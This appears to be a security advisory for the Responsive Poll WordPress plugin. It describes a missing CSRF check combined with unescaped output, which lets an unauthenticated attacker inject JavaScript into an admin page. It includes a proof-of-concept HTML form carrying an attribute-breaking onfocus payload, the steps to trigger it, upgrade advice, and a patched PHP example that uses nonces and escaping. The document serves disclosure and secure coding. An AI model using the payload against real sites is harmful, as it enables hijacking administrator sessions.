CSRF/XSS in Responsive Poll allows unauthenticated attackers to do almost anything an admin can

Score:
Vector: Network
Complexity: Medium
Authentication: None
Confidentiality: Partial
Integrity: Partial
Availability: None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.


This plugin lacks CSRF checks when updating polls, meaning an unauthenticated attacker can cause anything in a poll to be modified. The plugin also fails to escape values put into HTML. Combined, these two flaws mean that an unauthenticated attacker can put arbitrary JavaScript into a page in /wp-admin/.

Proof of concept

Create a poll. We assume that the ID of this poll will be 1.

Visit the following page and click submit (in a real attack the form can be submitted without user interaction):

<form method="POST" action="http://localhost/wp-admin/admin-ajax.php">
<input type="text" name="poll_id" value="1">
<input type="text" name="action" value="update_poll">
<input type="text" name="name" value="&quot; onfocus=&quot;alert(1)">
<input type="submit">
</form>

Then visit http://localhost/wp-admin/admin.php?page=polls&action=edit&edit_poll=1 and focus the Question field (either via clicking on it or tabbing to it).

Mitigation/further actions

Upgrade to version 1.7.6 or later.
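
For plugin authors reviewing their own code for the same pattern, the two controls missing here are a nonce check on the state-changing AJAX handler and attribute-context escaping on output. The following is an added example, not the plugin's code and not the 1.7.6 fix; every `example_` name, the `manage_options` capability and the use of the options table for storage are assumptions.

```php
<?php
// Added example: all example_* names are hypothetical, not the plugin's own.

// 1. State-changing AJAX handler: verify nonce and capability before writing.
add_action( 'wp_ajax_example_update_poll', 'example_update_poll' );

function example_update_poll() {
    // Ends the request with a 403 if the _ajax_nonce field is missing or was
    // not issued to this user for this action, so a cross-site form fails here.
    check_ajax_referer( 'example_update_poll', '_ajax_nonce' );

    // Assumed capability; use whichever one guards the poll admin screen.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $poll_id = isset( $_POST['poll_id'] ) ? absint( $_POST['poll_id'] ) : 0;
    // sanitize_text_field strips tags but keeps quotes, so output escaping
    // in the edit form below is still required.
    $name = isset( $_POST['name'] )
        ? sanitize_text_field( wp_unslash( $_POST['name'] ) )
        : '';

    if ( 0 === $poll_id ) {
        wp_send_json_error( 'bad poll_id', 400 );
    }

    // Assumed storage: one option per poll.
    update_option( "example_poll_{$poll_id}_name", $name );
    wp_send_json_success();
}

// 2. Edit screen: emit the nonce and escape the stored value for an attribute.
function example_render_edit_form( $poll_id ) {
    $poll_id     = absint( $poll_id );
    $stored_name = get_option( "example_poll_{$poll_id}_name", '' );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>">
        <input type="hidden" name="action" value="example_update_poll">
        <input type="hidden" name="poll_id" value="<?php echo esc_attr( $poll_id ); ?>">
        <?php wp_nonce_field( 'example_update_poll', '_ajax_nonce' ); ?>
        <!-- esc_attr encodes the double quote, so the value cannot close the attribute -->
        <input type="text" name="name" value="<?php echo esc_attr( $stored_name ); ?>">
        <input type="submit">
    </form>
    <?php
}
```

With both controls in place, the form in the proof of concept is rejected for lacking a valid nonce, and a stored value containing a double quote is rendered as text inside the `value` attribute instead of starting a new attribute.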